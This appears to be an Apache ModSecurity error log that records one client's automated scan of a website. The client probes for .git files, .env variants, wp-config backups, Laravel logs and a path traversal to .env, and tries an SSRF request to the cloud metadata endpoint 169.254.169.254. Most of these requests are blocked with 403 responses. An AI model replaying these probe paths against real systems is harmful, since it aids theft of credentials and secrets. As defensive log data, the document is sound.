[Tue May 12 01:27:44.350814 2026] [security2:error] [pid 1707624:tid 1707687] [client 45.148.10.246:15518] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/commit_editmsg"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agJl8LOxS7i6i_mT2NKxwAAAAEU"]
[Tue May 12 01:27:44.350849 2026] [security2:error] [pid 1691274:tid 1691286] [client 45.148.10.246:15628] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.git/HEAD"] [unique_id "agJl8FfdQaraX_prmqcIDAAAAAk"]
[Tue May 12 01:27:44.350855 2026] [security2:error] [pid 1707624:tid 1707699] [client 45.148.10.246:15640] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /storage/app/../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "of-crystal-lake.net"] [uri "/.env"] [unique_id "agJl8LOxS7i6i_mT2NKxwQAAAFE"]
[Tue May 12 01:27:44.350928 2026] [security2:error] [pid 1707624:tid 1707687] [client 45.148.10.246:15518] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agJl8LOxS7i6i_mT2NKxwAAAAEU"]
[Tue May 12 01:27:44.350955 2026] [security2:error] [pid 1707624:tid 1707699] [client 45.148.10.246:15640] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.env"] [unique_id "agJl8LOxS7i6i_mT2NKxwQAAAFE"]
[Tue May 12 01:27:44.350962 2026] [security2:error] [pid 1691274:tid 1691286] [client 45.148.10.246:15628] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.git/HEAD"] [unique_id "agJl8FfdQaraX_prmqcIDAAAAAk"]
[Tue May 12 01:27:44.351106 2026] [security2:error] [pid 1707624:tid 1707699] [client 45.148.10.246:15640] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.env"] [unique_id "agJl8LOxS7i6i_mT2NKxwQAAAFE"]
[Tue May 12 01:27:44.351157 2026] [security2:error] [pid 1691274:tid 1691286] [client 45.148.10.246:15628] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.git/HEAD"] [unique_id "agJl8FfdQaraX_prmqcIDAAAAAk"]
[Tue May 12 01:27:44.351258 2026] [security2:error] [pid 1707624:tid 1707687] [client 45.148.10.246:15518] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agJl8LOxS7i6i_mT2NKxwAAAAEU"]
[Tue May 12 01:27:44.351362 2026] [security2:error] [pid 1707624:tid 1707699] [client 45.148.10.246:15640] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.env"] [unique_id "agJl8LOxS7i6i_mT2NKxwQAAAFE"]
[Tue May 12 01:27:44.351623 2026] [security2:error] [pid 1695975:tid 1695982] [client 45.148.10.246:15602] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "of-crystal-lake.net"] [uri "/storage/logs/laravel.log"] [unique_id "agJl8NVI9ymHBxup7492lQAAAIQ"]
[Tue May 12 01:27:44.351643 2026] [:error] [pid 1630927:tid 1630952] [client 45.148.10.246:15532] File does not exist: /home/ofcrysta/public_html/info.php
[Tue May 12 01:27:44.351871 2026] [security2:error] [pid 1695975:tid 1695982] [client 45.148.10.246:15602] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/storage/logs/laravel.log"] [unique_id "agJl8NVI9ymHBxup7492lQAAAIQ"]
[Tue May 12 01:27:44.352135 2026] [security2:error] [pid 1695975:tid 1695982] [client 45.148.10.246:15602] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/storage/logs/laravel.log"] [unique_id "agJl8NVI9ymHBxup7492lQAAAIQ"]
[Tue May 12 01:27:44.353090 2026] [security2:error] [pid 1707624:tid 1707695] [client 45.148.10.246:15594] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/wp-config.php.txt"] [unique_id "agJl8LOxS7i6i_mT2NKxwgAAAE0"]
[Tue May 12 01:27:44.353247 2026] [security2:error] [pid 1707624:tid 1707695] [client 45.148.10.246:15594] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/wp-config.php.txt"] [unique_id "agJl8LOxS7i6i_mT2NKxwgAAAE0"]
[Tue May 12 01:27:44.353517 2026] [security2:error] [pid 1707624:tid 1707695] [client 45.148.10.246:15594] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/wp-config.php.txt"] [unique_id "agJl8LOxS7i6i_mT2NKxwgAAAE0"]
[Tue May 12 01:27:44.353969 2026] [security2:error] [pid 1709071:tid 1709096] [client 45.148.10.246:15582] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/main"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.git/refs/heads/main"] [unique_id "agJl8LvMumyrWMfSu7qSPAAAAMk"]
[Tue May 12 01:27:44.354080 2026] [security2:error] [pid 1709071:tid 1709096] [client 45.148.10.246:15582] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.git/refs/heads/main"] [unique_id "agJl8LvMumyrWMfSu7qSPAAAAMk"]
[Tue May 12 01:27:44.354257 2026] [security2:error] [pid 1709071:tid 1709096] [client 45.148.10.246:15582] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.git/refs/heads/main"] [unique_id "agJl8LvMumyrWMfSu7qSPAAAAMk"]
[Tue May 12 01:27:44.355658 2026] [security2:error] [pid 1709071:tid 1709108] [client 45.148.10.246:15546] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.env"] [unique_id "agJl8LvMumyrWMfSu7qSPgAAANU"]
[Tue May 12 01:27:44.355783 2026] [security2:error] [pid 1709071:tid 1709108] [client 45.148.10.246:15546] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.env"] [unique_id "agJl8LvMumyrWMfSu7qSPgAAANU"]
[Tue May 12 01:27:44.356325 2026] [security2:error] [pid 1709071:tid 1709108] [client 45.148.10.246:15546] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.env"] [unique_id "agJl8LvMumyrWMfSu7qSPgAAANU"]
[Tue May 12 01:27:44.356461 2026] [security2:error] [pid 1709071:tid 1709095] [client 45.148.10.246:15598] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/config/.env"] [unique_id "agJl8LvMumyrWMfSu7qSPwAAAMg"]
[Tue May 12 01:27:44.356587 2026] [security2:error] [pid 1709071:tid 1709095] [client 45.148.10.246:15598] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/config/.env"] [unique_id "agJl8LvMumyrWMfSu7qSPwAAAMg"]
[Tue May 12 01:27:44.356773 2026] [security2:error] [pid 1709071:tid 1709095] [client 45.148.10.246:15598] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/config/.env"] [unique_id "agJl8LvMumyrWMfSu7qSPwAAAMg"]
[Tue May 12 01:27:44.362484 2026] [security2:error] [pid 1691274:tid 1691284] [client 45.148.10.246:15474] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.env.example"] [unique_id "agJl8FfdQaraX_prmqcIDgAAAAc"]
[Tue May 12 01:27:44.362601 2026] [security2:error] [pid 1691274:tid 1691284] [client 45.148.10.246:15474] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.env.example"] [unique_id "agJl8FfdQaraX_prmqcIDgAAAAc"]
[Tue May 12 01:27:44.362791 2026] [security2:error] [pid 1691274:tid 1691284] [client 45.148.10.246:15474] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.env.example"] [unique_id "agJl8FfdQaraX_prmqcIDgAAAAc"]
[Tue May 12 01:27:44.363963 2026] [:error] [pid 1695975:tid 1695987] [client 45.148.10.246:15472] File does not exist: /home/ofcrysta/public_html/configuration.php
[Tue May 12 01:27:44.365916 2026] [security2:error] [pid 1707624:tid 1707694] [client 45.148.10.246:15484] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.env.production"] [unique_id "agJl8LOxS7i6i_mT2NKxwwAAAEw"]
[Tue May 12 01:27:44.366030 2026] [security2:error] [pid 1707624:tid 1707694] [client 45.148.10.246:15484] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.env.production"] [unique_id "agJl8LOxS7i6i_mT2NKxwwAAAEw"]
[Tue May 12 01:27:44.366216 2026] [security2:error] [pid 1707624:tid 1707694] [client 45.148.10.246:15484] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.env.production"] [unique_id "agJl8LOxS7i6i_mT2NKxwwAAAEw"]
[Tue May 12 01:27:44.369069 2026] [security2:error] [pid 1707624:tid 1707699] [client 45.148.10.246:15640] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "of-crystal-lake.net"] [uri "/_next/image"] [unique_id "agJl8LOxS7i6i_mT2NKxxAAAAFE"]
[Tue May 12 01:27:44.369589 2026] [security2:error] [pid 1695975:tid 1695997] [client 45.148.10.246:15612] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.env.development"] [unique_id "agJl8NVI9ymHBxup7492mAAAAJM"]
[Tue May 12 01:27:44.369703 2026] [security2:error] [pid 1695975:tid 1695997] [client 45.148.10.246:15612] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.env.development"] [unique_id "agJl8NVI9ymHBxup7492mAAAAJM"]
[Tue May 12 01:27:44.369885 2026] [security2:error] [pid 1695975:tid 1695997] [client 45.148.10.246:15612] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.env.development"] [unique_id "agJl8NVI9ymHBxup7492mAAAAJM"]
[Tue May 12 01:27:44.369963 2026] [security2:error] [pid 1691274:tid 1691286] [client 45.148.10.246:15628] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.env.bak"] [unique_id "agJl8FfdQaraX_prmqcIEAAAAAk"]
[Tue May 12 01:27:44.370062 2026] [security2:error] [pid 1707624:tid 1707699] [client 45.148.10.246:15640] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/_next/image"] [unique_id "agJl8LOxS7i6i_mT2NKxxAAAAFE"]
